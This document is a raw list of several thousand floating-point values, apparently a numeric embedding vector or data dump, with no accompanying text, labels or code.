-0.011602884158492088, 0.0014568024780601263, -0.009217519313097, -0.0022031492553651333, 0.010358666069805622, -0.00813527125865221, 0.005337621085345745, -0.01722763292491436, 0.039402689784765244, -0.002578623127192259, 0.02550278604030609, -0.005297129042446613, 0.014164942316710949, -0.00448360200971365, 0.026312632486224174, -0.007196585647761822, 0.01078567560762167, -0.04214144125580788, 0.009313228540122509, -0.0011291829869151115, 0.0005760949570685625, 0.014510967768728733, -0.00895984098315239, 0.005090986378490925, -0.047177210450172424, 0.01572573557496071, 0.01650613360106945, 0.022366473451256752, 0.03545653074979782, 0.026577671989798546, -0.009710789658129215, 0.021777493879199028, -0.005304491147398949, 0.012832378037273884, 0.01115378737449646, 0.007237078156322241, -0.030921392142772675, 0.014540416188538074, 0.0016592639731243253, -0.01128630805760622, 0.01678589917719364, -0.025134675204753876, -0.0024479434359818697, -0.004200155846774578, -0.014253289438784122, 0.0034528886899352074, -0.008496020920574665, 0.005326577927917242, -0.017595743760466576, 0.025841448456048965, -0.007310700602829456, -0.02428065426647663, 0.014820181764662266, 0.005746225360780954, -0.02280820719897747, 0.004825945943593979, 0.01842031441628933, 0.00763463880866766, 0.002930169925093651, 0.002979865064844489, -0.024074511602520943, -0.016182195395231247, -0.019554099068045616, -0.011580797843635082, 0.032128799706697464, 0.008142633363604546, -0.017301255837082863, 0.001731966040097177, -0.009909570217132568, -0.020040007308125496, 0.029286975041031837, 0.02501687780022621, 0.01041756384074688, -0.015055772848427296, 0.0345141626894474, -0.02185111679136753, 0.017154010012745857, -0.010557446628808975, 0.015652114525437355, 0.004833308048546314, -0.010189334861934185, -0.05771993100643158, -0.000650177476927638, -0.015828806906938553, -0.0000018261796412843978, 0.04729500412940979, 0.02107072062790394, 0.0009616920724511147, 0.03371904045343399, 0.018273070454597473, 0.013134228996932507, 0.0017945450963452458, -0.0011393059976398945, 0.00019555940525606275, -0.025075776502490044, 0.005845615640282631, -0.015092584304511547, 0.012582061812281609, 0.002355915494263172, 0.005510633811354637, -0.022204503417015076, -0.014032422564923763, -0.03904930129647255, -0.007671450264751911, 0.029713984578847885, 0.0011107773752883077, -0.014128130860626698, -0.0005954208318144083, -0.015210379846394062, -0.004792815539985895, -0.004663976840674877, 0.006530303508043289, -0.017890233546495438, -0.0427304171025753, -0.00861381646245718, -0.039196547120809555, 0.034308020025491714, -0.020687883719801903, 0.013053244911134243, 0.003254108363762498, 0.003042444121092558, 0.034072428941726685, 0.04470349848270416, -0.04290711134672165, -0.036016058176755905, 0.02595924399793148, 0.02058481238782406, 0.01870007999241352, -0.029257526621222496, 0.0320110023021698, 0.005422287154942751, -0.016403062269091606, -0.007248121313750744, -0.012044618837535381, -0.010233508422970772, 0.008864132687449455, -0.0069609940983355045, 0.011352567933499813, 0.023721124976873398, 0.009386851452291012, -0.006302074063569307, 0.0066701858304440975, 0.012780842371284962, 0.011816388927400112, -0.04193529859185219, 0.01865590736269951, 0.0026209561619907618, -0.010115712881088257, 0.0020430204458534718, -0.03421967476606369, 0.013789468444883823, -0.005624748300760984, -0.0009391452767886221, 0.008444485254585743, 0.0015377870295196772, -0.023868368938565254, 0.0047780913300812244, -0.0035209895577281713, -0.007395366206765175, 0.00789231713861227, 0.007781883701682091, -0.03368959203362465, 0.028005946427583694, 0.01743377558887005, -0.012766117230057716, -0.002672491827979684, 0.021541902795433998, 0.027461141347885132, -0.015298726968467236, 0.02157135121524334, 0.03474975377321243, -0.014341635629534721, -0.007115601096302271, -0.021497730165719986, 0.014820181764662266, -0.0042958646081388, -0.030185168609023094, -0.028050119057297707, 0.014510967768728733, 0.0033093250822275877, -0.019833864644169807, -0.018788427114486694, -0.007553654257208109, 0.005072580650448799, 0.046676576137542725, -0.00413021445274353, -0.004152301233261824, -0.0014558822149410844, 0.04140521585941315, -0.005271361209452152, -0.011970995925366879, -0.028948312625288963, 0.0016730681527405977, 0.010505910962820053, -0.0193626806139946, -0.014032422564923763, -0.05162400007247925, -0.007126644719392061, 0.022719860076904297, -0.0030203573405742645, 0.02908083237707615, -0.01772826537489891, 0.008341413922607899, -0.021983636543154716, -0.015814082697033882, 0.015195655636489391, 0.004082359839230776, 0.019760241732001305, 0.01694786734879017, -0.01774298958480358, 0.036251649260520935, 0.01576991006731987, -0.007288613822311163, -0.0030277196783572435, -0.015872981399297714, -0.011278945952653885, -0.016918418928980827, -0.029684536159038544, -0.0031252691987901926, 0.018037479370832443, 0.028329884633421898, -0.006655461620539427, -0.006268944125622511, 0.011102251708507538, -0.012272847816348076, 0.018317243084311485, -0.029758159071207047, -0.04617594555020332, -0.002398248529061675, 0.021188516169786453, -0.02691633626818657, 0.001195443095639348, -0.029669811949133873, 0.022852381691336632, 0.01056480873376131, 0.0021681785583496094, -0.034838102757930756, -0.011448277160525322, -0.021468279883265495, -0.006456681061536074, 0.022955453023314476, 0.012640959583222866, -0.010358666069805622, -0.008488657884299755, 0.017315980046987534, -0.02227812632918358, -0.025620581582188606, 0.014245927333831787, 0.027313895523548126, 0.010159885510802269, -0.014540416188538074, 0.00996110588312149, 0.023485533893108368, -0.025326091796159744, 0.008864132687449455, -0.0455869659781456, 0.035544876009225845, -0.0008397550554946065, -0.008415035903453827, -0.0022473225835710764, 0.027755631133913994, -0.007553654257208109, -0.025767827406525612, 0.03860756754875183, -0.006250538397580385, 0.02890413999557495, -0.039667729288339615, 0.01867063157260418, -0.004376849625259638, 0.013634861446917057, 0.015107308514416218, -0.017286529764533043, 0.0008006431744433939, 0.013045882806181908, 0.02912500686943531, 0.004612441174685955, -0.021217964589595795, -0.026577671989798546, -0.031009739264845848, -0.009924294427037239, -0.01406923308968544, -0.003894622903317213, 0.03595716133713722, -0.014304825104773045, -0.02909555658698082, 0.013082693330943584, -0.057837728410959244, -0.020540639758110046, -0.016830071806907654, 0.007561016362160444, -0.010977094061672688, -0.003664553165435791, 0.01296489778906107, -0.015946604311466217, 0.02086457796394825, 0.017610469833016396, -0.027019407600164413, 0.005495909135788679, -0.024295378476381302, -0.009762325324118137, 0.00759046571329236, 0.0042222426272928715, 0.008208893239498138, 0.018022753298282623, 0.03572157025337219, -0.016859520226716995, -0.005175651982426643, -0.036516692489385605, 0.000914757838472724, -0.034337468445301056, -0.000878866936545819, -0.03424912318587303, 0.0274022426456213, 0.012685133144259453, -0.010844574309885502, -0.03854866698384285, -0.020025283098220825, -0.0016141702653840184, -0.024796010926365852, 0.008363500237464905, -0.002585985464975238, 0.011573434807360172, 0.031422022730112076, -0.0005287005915306509, 0.008422398008406162, 0.029934851452708244, 0.027063580229878426, -0.036222200840711594, -0.015011599287390709, -0.0009078557486645877, 0.008680076338350773, 0.0142017537727952, -0.0095929941162467, 0.010115712881088257, -0.009894845075905323, -0.04387892782688141, -0.01844976469874382, 0.014982150867581367, 0.010123074986040592, -0.00484067015349865, -0.0548044852912426, -0.018803151324391365, 0.0056505161337554455, -0.04661767929792404, 0.015961328521370888, 0.02936059795320034, -0.013553876429796219, -0.0013353255344554782, -0.008496020920574665, -0.010815124958753586, 0.03177541121840477, -0.031186431646347046, 0.0019012974807992578, -0.01453305408358574, 0.0016611044993624091, 0.001036234782077372, -0.009666616097092628, 0.012847102247178555, -0.0019914847798645496, 0.009084999561309814, 0.01359068788588047, -0.03254108503460884, 0.004748642444610596, 0.013855728320777416, 0.005841934587806463, -0.0013472891878336668, 0.0061032939702272415, 0.010351303964853287, 0.024324828758835793, 0.014393171295523643, -0.005768312141299248, -0.0028620692901313305, -0.0225431676954031, -0.011595522053539753, -0.01895039528608322, 0.014827543869614601, -0.01694786734879017, 0.028683271259069443, 0.004884843714535236, 0.00263752113096416, 0.02307324856519699, 0.009732875972986221, -0.015122032724320889, 0.01490116585046053, -0.028329884633421898, 0.0063683344051241875, 0.007078790105879307, -0.04058064520359039, -0.03395463153719902, -0.0023540749680250883, 0.0008756459574215114, -0.007086152210831642, 0.005801442079246044, -0.015372348949313164, 0.02205725945532322, 0.0026504050474613905, -0.0031013418920338154, -0.006313117686659098, -0.016918418928980827, -0.025075776502490044, 0.014761283062398434, 0.01847921311855316, 0.005606343038380146, 0.016844796016812325, 0.0005052334745414555, 0.0001424132497049868, -0.004652933217585087, -0.027225550264120102, -0.024604592472314835, 0.001967557705938816, -0.01962772198021412, 0.03177541121840477, -0.025620581582188606, 0.0033222089987248182, 0.0012764276470988989, -0.031392574310302734, -0.00752420537173748, -0.002926488872617483, 0.008091097697615623, 0.0021350483875721693, 0.006585520226508379, -0.04099293053150177, -0.004012418910861015, -0.003633263520896435, -0.019333232194185257, -0.013539152219891548, 0.008194169029593468, -0.032629430294036865, -0.000633152318187058, -0.020437568426132202, -0.01456986553966999, 0.04299546033143997, 0.036016058176755905, 0.0005678124725818634, 0.019215436652302742, -0.03713512048125267, -0.019215436652302742, -0.011499812826514244, 0.01774298958480358, -0.010881384834647179, 0.0034068748354911804, -0.021910015493631363, -0.039402689784765244, -0.004409979563206434, -0.03053855523467064, -0.00826042890548706, 0.006872647441923618, -0.017419051378965378, 0.0345141626894474, -0.001546069630421698, -0.004001375287771225, -0.001863565994426608, -0.02762310951948166, 0.027122478932142258, -0.01069732941687107, 0.006232133135199547, -0.015519593842327595, 0.032393839210271835, 0.0056652408093214035, 0.019112365320324898, -0.0029062426183372736, 0.005311853252351284, 0.010896109975874424, -0.024074511602520943, -0.0042958646081388, 0.01526927761733532, -0.04870855435729027, 0.02569420449435711, 0.00038398662582039833, 0.0008144473540596664, 0.005087305326014757, -0.011661781929433346, -0.008061648346483707, -0.04649988189339638, -0.032835572957992554, -0.012832378037273884, -0.00971815176308155, 0.027608385309576988, 0.011514537036418915, 0.011264221742749214, 0.007318062707781792, -0.002339350525289774, 0.02180694416165352, -0.027254998683929443, -0.00798802636563778, 0.019112365320324898, -0.008562280796468258, -0.022955453023314476, -0.0029688216745853424, -0.029213353991508484, 0.00835613813251257, 0.001978600863367319, 0.012191862799227238, 0.014761283062398434, 0.031863756477832794, 0.006592882331460714, 0.018258346244692802, 0.006180597469210625, 0.020790955051779747, -0.02105599455535412, -0.012412730604410172, 0.00624317629262805, -0.00017082688282243907, 0.016800623387098312, -0.01141882874071598, 0.016623929142951965, -0.005900832358747721, 0.0059670922346413136, -0.0028915181756019592, 0.03218769654631615, -0.04002111405134201, -0.014378447085618973, 0.00763463880866766, 0.013369821012020111, 0.009799136780202389, -0.03657558932900429, -0.03174596279859543, 0.006279987283051014, -0.0005079943221062422, 0.01008626352995634, -0.0149158900603652, -0.01261151023209095, 0.0013224416179582477, -0.01554904319345951, -0.00042931039934046566, 0.0548044852912426, 0.0007601508987136185, -0.014739196747541428, -0.02476656250655651, 0.015210379846394062, 0.00910708587616682, 0.03209935128688812, -0.01165441982448101, 0.008797871880233288, -0.02547333762049675, -0.008554918691515923, -0.0193626806139946, -0.03807748481631279, -0.007244440261274576, -0.011485088616609573, 0.011205323040485382, 0.007914403453469276, 0.00018520625599194318, 0.007064065430313349, 0.004873800557106733, -0.008577005006372929, -0.0029172860085964203, -0.006386739667505026, -0.013693759217858315, -0.0013647745363414288, -0.01395879965275526, 0.0013482094509527087, 0.007965939119458199, -0.013907263986766338, -0.02352970652282238, 0.007487394381314516, 0.006699634715914726, -0.038666464388370514, -0.0009193592704832554, -0.006596563383936882, 0.0020448612049221992, 0.003138153115287423, -0.02229285053908825, -0.01749267242848873, -0.005039450712502003, -0.031922657042741776, -0.012751393020153046, -0.014238564297556877, -0.0021921058651059866, 0.008842045441269875, 0.053744323551654816, 0.012074067257344723, -0.022940728813409805, -0.0026522455736994743, -0.02838878333568573, -0.006626012735068798, -0.0024902764707803726, 0.0036093362141400576, 0.015563767403364182, 0.0034234398044645786, 0.014039784669876099, 0.011919460259377956, 0.02688688598573208, 0.01029240619391203, -0.015504869632422924, 0.0032946006394922733, 0.004071316681802273, -0.023853644728660583, -0.0008144473540596664, 0.004623484332114458, 0.030140994116663933, 0.008657990023493767, 0.01747794821858406, -0.046941619366407394, 0.007281251717358828, -0.014746558852493763, -0.02544388733804226, 0.008525469340384007, -0.004343719221651554, 0.007561016362160444, -0.014061870984733105, -0.019480476155877113, -0.01895039528608322, -0.010712053626775742, 0.016138020902872086, -0.006449318956583738, 0.018008029088377953, 0.001978600863367319, 0.019819140434265137, -0.004649252165108919, 0.015004237182438374, -0.029257526621222496, 0.008915668353438377, -0.011367293074727058, -0.004432066343724728, -0.018037479370832443, 0.014893803745508194, 0.010682604275643826, 0.003333252388983965, -0.0011116976384073496, -0.013546514324843884, 0.0055327205918729305, -0.0012699856888502836, 0.05453944578766823, -0.003806276014074683, 0.00947519764304161, -0.009453111328184605, 0.007502118591219187, 0.019318507984280586, -0.017610469833016396, 0.011256858706474304, -0.009924294427037239, 0.021453555673360825, 0.016682827845215797, -0.02011362835764885, -0.04337829723954201, -0.008540193550288677, 0.018626457080245018, -0.00023697197320871055, -0.005124116316437721, 0.005131478421390057, -0.000562750909011811, 0.007612552028149366, -0.013340371660888195, 0.00040998452459461987, 0.0031952105928212404, -0.023912543430924416, -0.011463001370429993, -0.01067524217069149, 0.0016150905285030603, 0.004586673341691494, 0.04832571744918823, -0.018876774236559868, 0.007929128594696522, -0.018376141786575317, -0.010586895979940891, 0.01649140939116478, -0.001081328489817679, 0.004236966837197542, -0.037223465740680695, 0.030008474364876747, 0.007200267165899277, 0.0020098905079066753, -0.0058235288597643375, 0.005952368024736643, -0.007502118591219187, 0.009872758761048317, 0.008945116773247719, -0.0018479212885722518, -0.005484865978360176, 0.005308172199875116, -0.021262137219309807, 0.03148092329502106, -0.0005075341323390603, -0.04005056619644165, 0.010726777836680412, 0.0063536097295582294, 0.010712053626775742, 0.02936059795320034, -0.00233750999905169, -0.026577671989798546, 0.0014577227411791682, 0.008930392563343048, -0.023470809683203697, -0.01052799727767706, -0.005223506595939398, 0.0026209561619907618, 0.020702607929706573, -0.001099733985029161, 0.004965828265994787, -0.015563767403364182, 0.0050799427554011345, 0.04314270243048668, -0.0063793775625526905, 0.003128950484097004, 0.013671672903001308, -0.026400979608297348, -0.013362458907067776, 0.015902429819107056, 0.025576408952474594, -0.005562169477343559, 0.02519357204437256, -0.0013307242188602686, 0.004461515229195356, 0.0407278910279274, 0.004741279873996973, 0.029949577525258064, -0.006872647441923618, 0.016388338059186935, -0.0203639455139637, -0.0003676516644190997, -0.012272847816348076, 0.025812000036239624, 0.010226146318018436, 0.01409132033586502, 0.012530526146292686, -0.0019473114516586065, 0.00321729714050889, 0.020069455727934837, 0.005746225360780954, -0.0025473337154835463, -0.0034823378082364798, 0.024383725598454475, 0.043231051415205, 0.00030714328750036657, -0.0015350262401625514, -0.007943852804601192, -0.016903694719076157, -0.02690161019563675, 0.010299768298864365, -0.005757268518209457, 0.01677117310464382, 0.026607122272253036, 0.008900943212211132, 0.02547333762049675, -0.010608982294797897, -0.003193369833752513, -0.08375279605388641, -0.024103961884975433, -0.006835836451500654, 0.02888941392302513, 0.006456681061536074, -0.03265887871384621, 0.012537888251245022, 0.03204045072197914, 0.011124338954687119, -0.028241537511348724, 0.003655350301414728, -0.006062801461666822, -0.015041048638522625, -0.018597008660435677, 0.0172570813447237, 0.0023246260825544596, 0.011234772391617298, 0.00726652704179287, -0.011845838278532028, 0.011183236725628376, 0.0075462921522557735, -0.03416077420115471, 0.006736446171998978, 0.026268457993865013, 0.047412801533937454, -0.00763463880866766, -0.01939213089644909, -0.02232230082154274, -0.014562503434717655, 0.003798913909122348, -0.007686174474656582, 0.008974566124379635, -0.054186057299375534, -0.0005171970697119832, 0.01964244619011879, 0.0011632333043962717, 0.019539374858140945, 0.024884358048439026, -0.02227812632918358, 0.03280612453818321, -0.014776008203625679, -0.006854241713881493, 0.0019546737894415855, -0.015077860094606876, -0.006412507500499487, -0.002528928220272064, 0.00641987007111311, 0.00013171500177122653, 0.02185111679136753, 0.012699857354164124, -0.02478128671646118, -0.002313582692295313, 0.003165761474519968, -0.020776230841875076, -0.010042089968919754, 0.008709525689482689, 0.012552612461149693, -0.013679035007953644, -0.006729084067046642, 0.024089237675070763, -0.008657990023493767, -0.021011821925640106, 0.003920390736311674, 0.0011485088616609573, 0.00504313176497817, 0.018331967294216156, -0.00200436869636178, -0.015607940964400768, 0.013067969121038914, 0.005087305326014757, -0.006449318956583738, 0.03106863610446453, -0.039167094975709915, -0.013148954138159752, -0.01286918856203556, -0.0073622362688183784, 0.013708483427762985, -0.010748865082859993, -0.00015840311243664473, 0.02448679693043232, 0.023485533893108368, 0.0037418564315885305, 0.0004302306624595076, -0.026739642024040222, 0.012898637913167477, -0.005010001827031374, 0.010888746939599514, 0.01018197275698185, -0.01198572013527155, 0.014017697423696518, -0.01383364200592041, -0.0029835461173206568, -0.015372348949313164, -0.009298504330217838, -0.012758755125105381, -0.006865285336971283, 0.007491075433790684, -0.02569420449435711, 0.009806498885154724, 0.011013905517756939, -0.007730348035693169, 0.004932698328047991, 0.0005162768065929413, 0.009180708788335323, -0.012317021377384663, -0.007358555216342211, 0.010653155855834484, -0.0011181395966559649, -0.0036461474373936653, 0.005146203096956015, -0.014002973213791847, -0.01744849979877472, 0.005679965019226074, 0.011801664717495441, 0.015519593842327595, 0.015298726968467236, 0.011514537036418915, -0.021880565211176872, 0.012950173579156399, 0.006626012735068798, -0.03371904045343399, -0.02087930217385292, -0.006699634715914726, 0.007553654257208109, -0.01574046164751053, 0.013185764662921429, -0.03304171562194824, 0.00046036983258090913, -0.01069732941687107, -0.011978358030319214, 0.04847296327352524, 0.0249727051705122, -0.03740015998482704, 0.012074067257344723, -0.015681562945246696, 0.032629430294036865, 0.009732875972986221, -0.021748045459389687, 0.012832378037273884, -0.0018516023410484195, -0.008923030458390713, 0.007995388470590115, 0.012074067257344723, 0.0534498356282711, -0.019303783774375916, -0.0016362570459023118, -0.000036178487789584324, -0.007907041348516941, 0.02884524129331112, 0.00014195311814546585, 0.017757713794708252, -0.005871383473277092, -0.012582061812281609, 0.026783814653754234, 0.012707219459116459, -0.024840185418725014, -0.02890413999557495, 0.019112365320324898, -0.009512009099125862, 0.016167471185326576, 0.007181861437857151, -0.019686618819832802, 0.02470766380429268, 0.009534095413982868, 0.026121214032173157, -0.009040826000273228, 0.02592979557812214, -0.007163455709815025, 0.00824570469558239, -0.0020632667001336813, 0.015666838735342026, -0.022395921871066093, -0.019347956404089928, -0.020732056349515915, 0.02139465883374214, -0.02087930217385292, -0.019215436652302742, -0.005985497962683439, -0.010005278512835503, 0.015445971861481667, 0.008253066800534725, 0.001706198207102716, 0.010285044088959694, -0.005116754211485386, 0.00293753226287663, -0.009497284889221191, 0.02834460884332657, 0.008621178567409515, 0.01744849979877472, 0.019303783774375916, 0.006994124501943588, -0.01187528669834137, -0.04002111405134201, -0.029964301735162735, 0.010689967311918736, -0.015372348949313164, -0.006095931399613619, -0.02308797277510166, 0.0218658410012722, -0.034543611109256744, -0.03616330400109291, -0.009504646994173527, 0.015946604311466217, -0.004542499780654907, -0.01578463427722454, -0.017360152676701546, 0.010285044088959694, -0.017154010012745857, 0.028035394847393036, 0.02690161019563675, -0.020761506631970406, -0.013001709245145321, 0.03589826449751854, -0.004811221268028021, -0.007995388470590115, 0.010476461611688137, -0.013362458907067776, -0.030950840562582016, -0.009401575662195683, -0.008621178567409515, 0.004859075881540775, -0.0031768048647791147, -0.01895039528608322, -0.014879079535603523, 0.006909458432346582, 0.01528400182723999, 0.022719860076904297, -0.01674172468483448, 0.009563544765114784, 0.0388726070523262, 0.010078901425004005, -0.022970177233219147, -0.004781772382557392, 0.030980288982391357, 0.012442179024219513, -0.026342080906033516, 0.015622665174305439, -0.006891053169965744, -0.004045548848807812, 0.008540193550288677, -0.03416077420115471, 0.006986761931329966, -0.015055772848427296, 0.015637390315532684, 0.004325313959270716, 0.04688271880149841, 0.004627165384590626, -0.014481518417596817, -0.0048296269960701466, -0.013193126767873764, -0.0038872607983648777, -0.02790287509560585, 0.012913362123072147, -0.004998958203941584, 0.0005319215706549585, 0.005190376657992601, -0.02208670787513256, 0.013163678348064423, -0.0015249031130224466, 0.030891943722963333, -0.013156316243112087, -0.008797871880233288, 0.02567948028445244, -0.0007932809530757368, 0.020187251269817352, 0.008378224447369576, 0.02906610816717148, 0.002098237397149205, -0.030155720189213753, 0.0113967414945364, -0.010505910962820053, -0.008569642901420593, -0.00019038282334804535, 0.0033350929152220488, 0.00802483782172203, -0.012250760570168495, 0.006184278521686792, 0.0014696863945573568, 0.004741279873996973, -0.02110016904771328, -0.0028970399871468544, 0.013855728320777416, -0.019583547487854958, 0.02136520855128765, -0.005573212634772062, 0.005138840992003679, 0.0046823821030557156, -0.003359020221978426, -0.012942811474204063, 0.019568823277950287, 0.018302518874406815, -0.00011635784176178277, -0.007126644719392061, 0.024162858724594116, -0.011683869175612926, 0.00272586802020669, -0.005908194463700056, 0.009497284889221191, 0.009114447981119156, -0.012655683793127537, -0.034808654338121414, -0.019082916900515556, -0.01603494957089424, 0.0010334738763049245, -0.013148954138159752, 0.020496465265750885, 0.004954785108566284, -0.004634527489542961, 0.005333940032869577, -0.007299656979739666, -0.0027295490726828575, 0.014658212661743164, 0.007310700602829456, 0.018287794664502144, 0.019745517522096634, 0.013274111784994602, 0.010351303964853287, 0.0008425159030593932, 0.02453097142279148, 0.026607122272253036, 0.01750739850103855, -0.008687438443303108, 0.019068190827965736, -0.013936713337898254, 0.003692161524668336, -0.02743169106543064, 0.008569642901420593, -0.007196585647761822, 0.00467501999810338, 0.0011310235131531954, 0.012250760570168495, 0.00279396865516901, 0.013369821012020111, -0.008054286241531372, 0.0024332189932465553, 0.012383281253278255, -0.031422022730112076, 0.021291587501764297, 0.00020349680562503636, -0.011794302612543106, -0.0062358141876757145, -0.008672714233398438, 0.0068027060478925705, -0.003960883244872093, 0.007973302155733109, 0.00047256352263502777, 0.028212089091539383, 0.029051383957266808, 0.012537888251245022, 0.003382947528734803, -0.004255372565239668, -0.01029240619391203, -0.006699634715914726, -0.008437122218310833, 0.0011301032500341535, -0.0011475885985419154, -0.013178402557969093, -0.005035769660025835, -0.004203836899250746, -0.017875509336590767, -0.01066051796078682, -0.004376849625259638, -0.011970995925366879, 0.018008029088377953, 0.01576991006731987, -0.006784300785511732, -0.033306755125522614, 0.00539651932194829, 0.018567560240626335, 0.0007619914249517024, -0.017360152676701546, -0.007516843266785145, -0.0026154343504458666, 0.008311964571475983, -0.006633374840021133, 0.022219229489564896, 0.005860339850187302, -0.0025160443037748337, -0.030273515731096268, 0.008046924136579037, -0.03056800365447998, -0.008606454357504845, 0.007295975927263498, -0.03003792278468609, -0.0038983039557933807, -0.011234772391617298, -0.021910015493631363, 0.012339107692241669, 0.021011821925640106, -0.002309901639819145, -0.006725402548909187, -0.006154829636216164, 0.015711011365056038, 0.0030976608395576477, 0.0049474225379526615, 0.024369001388549805, 0.027004681527614594, 0.002933851210400462, 0.01750739850103855, 0.003009313950315118, 0.010167248547077179, 0.0008093858486972749, -0.02155662700533867, 0.0006083047483116388, -0.008289878256618977, -0.01774298958480358, 0.020422842353582382, -0.0009469676297158003, -0.002420335076749325, -0.007907041348516941, 0.005072580650448799, 0.0030534875113517046, 0.009372126311063766, 0.009872758761048317, 0.02425120584666729, 0.013274111784994602, -0.005617386195808649, 0.00006378687248798087, -0.013826279900968075, 0.004557223990559578, -0.016933143138885498, -0.02542916312813759, -0.02616538666188717, -0.0021865840535610914, -0.00461980327963829, 0.008010112680494785, 0.013126866891980171, -0.004741279873996973, -0.006714359391480684, -0.014591951854526997, 0.009298504330217838, 0.010999180376529694, 0.011558710597455502, 0.003375585190951824, 0.018523385748267174, 0.004678701050579548, -0.014606676995754242, -0.009843309409916401, -0.001011387212201953, 0.03177541121840477, -0.006467724684625864, -0.01067524217069149, 0.00898192822933197, 0.0032835572492331266, -0.03884315863251686, -0.007597827818244696, 0.001985963201150298, 0.0011024948908016086, 0.012942811474204063, 0.016461960971355438, 0.01604967564344406, -0.003806276014074683, -0.0252230204641819, 0.010167248547077179, 0.010638431645929813, 0.0142017537727952, 0.0142017537727952, -0.02690161019563675, 0.001319680828601122, 0.024663491174578667, 0.0010233508655801415, 0.004292183555662632, -0.004612441174685955, -0.0034031937830150127, 0.014032422564923763, 0.01790495775640011, 0.003745537716895342, 0.0025105224922299385, 0.02501687780022621, -0.018037479370832443, -0.0017420891672372818, -0.004288502503186464, -0.0059707737527787685, 0.02594451978802681, -0.009629804641008377, -0.007064065430313349, 0.007439539767801762, 0.014223840087652206, -0.012589423917233944, -0.0052271876484155655, -0.0013491298304870725, 0.002532609272748232, 0.00576463108882308, 0.021262137219309807, 0.020010557025671005, 0.003324049524962902, 0.020717332139611244, -0.019009293988347054, -0.022646239027380943, -0.041581910103559494, -0.017095113173127174, -0.009710789658129215, 0.011367293074727058, 0.025281919166445732, 0.010078901425004005, 0.016668101772665977, 0.012707219459116459, 0.015041048638522625, -0.0036811181344091892, -0.018066927790641785, -0.0008899102685973048, 0.0055179959163069725, 0.021527178585529327, -0.009600356221199036, 0.015166206285357475, 0.026224285364151, 0.001045437529683113, 0.008216255344450474, 0.002173700137063861, -0.022955453023314476, -0.011102251708507538, -0.008510745130479336, -0.005050493869930506, 0.014393171295523643, -0.016579756513237953, -0.010734139941632748, -0.0264746006578207, -0.01749267242848873, -0.0039167096838355064, 0.007826057262718678, 0.0016739884158596396, -0.00721131032332778, -0.022660963237285614, 0.00672172149643302, -0.0045388187281787395, 0.015504869632422924, -0.008584367111325264, -0.01528400182723999, -0.012736668810248375, 0.0001439087063772604, 0.010601620189845562, -0.013377183116972446, -0.008923030458390713, -0.007446901872754097, 0.017419051378965378, -0.01824362203478813, 0.0029044020920991898, -0.026577671989798546, 0.01078567560762167, 0.005319215822964907, 0.010078901425004005, -0.002930169925093651, 0.00010525697143748403, 0.023676952347159386, -0.02017252705991268, 0.01198572013527155, 0.0025638986844569445, 0.002234438667073846, 0.0025988693814724684, -0.022395921871066093, -0.01141882874071598, 0.007284932769834995, 0.003121588146314025, -0.019318507984280586, 0.00504313176497817, -0.011926822364330292, -0.018965119495987892, 0.019789690151810646, -0.021262137219309807, 0.013229938223958015, -0.02009890414774418, -0.02015780285000801, 0.012368557043373585, 0.012685133144259453, -0.00014344857481773943, 0.006210046354681253, -0.008790509775280952, -0.000029707773137488402, 0.0020006876438856125, 0.014746558852493763, 0.005293447989970446, -0.005072580650448799, 0.018390865996479988, 0.011838476173579693, 0.003791551571339369, 0.013693759217858315, 0.009077637456357479, 0.005602661520242691, -0.008775785565376282, -0.023456083610653877, 0.016299990937113762, -0.009232244454324245, 0.016550306230783463, -0.0019031380070373416, 0.019524650648236275, 0.02136520855128765, 0.022719860076904297, -0.005146203096956015, 0.003913028631359339, -0.00013355557166505605, -0.006548709236085415, 0.009916932322084904, 0.0103071304038167, 0.0015948443906381726, 0.007568378932774067, -0.011926822364330292, -0.005286085419356823, -0.003145515453070402, 0.012449541129171848, -0.0066849105060100555, -0.01296489778906107, -0.0017089591128751636, -0.013148954138159752, -0.028948312625288963, 0.00704566016793251, 0.01675644889473915, -0.0031344720628112555, 0.015946604311466217, -0.014150218106806278, 0.01702149026095867, -0.0032025726977735758, -0.013045882806181908, 0.015122032724320889, -0.0018074290128424764, -0.008297240361571312, 0.0023006987757980824, 0.0022620470263063908, 0.00025215657660737634, 0.0035578005481511354, 0.0023264666087925434, 0.015357624739408493, 0.01272194366902113, -0.013384545221924782, -0.010859298519790173, 0.007376960478723049, 0.024074511602520943, -0.015136757865548134, 0.011352567933499813, 0.013907263986766338, 0.011234772391617298, -0.0013730570208281279, 0.00839294958859682, 0.008510745130479336, -0.005503271706402302, 0.0016022066120058298, -0.006180597469210625, -0.00293753226287663, 0.017301255837082863, 0.008547556586563587, -0.014996875077486038, 0.022867105901241302, 0.008643264882266521, 0.010461737401783466, 0.015239829197525978, 0.02110016904771328, -0.025149399414658546, 0.0022565254475921392, 0.011278945952653885, 0.011485088616609573, -0.013244662433862686, -0.005510633811354637, 0.005473822820931673, 0.005852977745234966, 0.008230980485677719, -0.0181847233325243, 0.01986331306397915, -0.0034749754704535007, 0.021777493879199028, 0.00046727192238904536, 0.015593215823173523, -0.014275375753641129, -0.0038283627945929766, -0.02108544483780861, -0.00599654158577323, 0.008488657884299755, 0.007067746948450804, -0.021733321249485016, 0.008525469340384007, 0.01572573557496071, -0.013921988196671009, -0.04929753392934799, 0.018597008660435677, 0.004888524767011404, -0.008687438443303108, -0.00212584575638175, 0.019995832815766335, 0.007781883701682091, 0.027799803763628006, 0.0030553280375897884, -0.008996652439236641, -0.0068174307234585285, -0.017860785126686096, -0.004387892782688141, 0.004340038169175386, 0.009320590645074844, 0.016830071806907654, 0.017095113173127174, 0.015151482075452805, 0.005679965019226074, -0.007568378932774067, -0.008753699250519276, 0.004984233994036913, -0.00533025898039341, 0.016138020902872086, 0.0012451382353901863, 0.009173346683382988, -0.020923474803566933, -0.012280209921300411, 0.018302518874406815, -0.010211421176791191, -0.017654642462730408, -0.011440915055572987, -0.015872981399297714, 0.0033884691074490547, 0.011146425269544125, 0.0016749086789786816, -0.005300810094922781, 0.01455514132976532, -0.004395254887640476, 0.009902208112180233, 0.0038320438470691442, -0.01844976469874382, 0.00539651932194829, -0.00016507513646502048, 0.008157357573509216, -0.007619914598762989, -0.009276418015360832, -0.002144251251593232, 0.009990554302930832, -0.008083735592663288, 0.025635305792093277, -0.026562947779893875, -0.01824362203478813, -0.036251649260520935, 0.019789690151810646, -0.017551571130752563, 0.005076261702924967, 0.0027369114104658365, 0.000011323752005409915, -0.001995166065171361, -0.005834572017192841, 0.01165441982448101, 0.021497730165719986, 0.020555363968014717, -0.022440096363425255, -0.008348776027560234, 0.004932698328047991, 0.003624060656875372, -0.012015169486403465, -0.020511189475655556, -0.0013482094509527087, 